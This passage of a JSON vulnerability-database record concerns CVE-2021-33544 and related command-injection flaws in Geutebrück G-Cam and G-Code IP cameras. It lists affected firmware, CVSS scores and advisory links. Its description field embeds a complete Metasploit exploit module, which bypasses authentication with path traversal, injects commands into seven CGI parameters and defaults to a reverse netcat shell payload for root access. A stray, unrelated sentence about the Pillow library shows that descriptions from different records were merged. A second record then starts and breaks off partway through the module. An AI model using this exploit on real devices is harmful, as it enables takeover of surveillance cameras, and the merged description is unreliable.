            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33544",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33544",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33544",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33544",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33544",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2093",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. \n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n    end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33544"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33544",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33544",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "id": "VAR-202109-0597",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T21:21:41.117000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2  and  G-Code Fixes for command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158073"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:21.130000",
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:51.497000",
            "db": "NVD",
            "id": "CVE-2021-33544"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2093"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0860

    Vulnerability from variot - Updated: 2025-01-30 21:08

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck

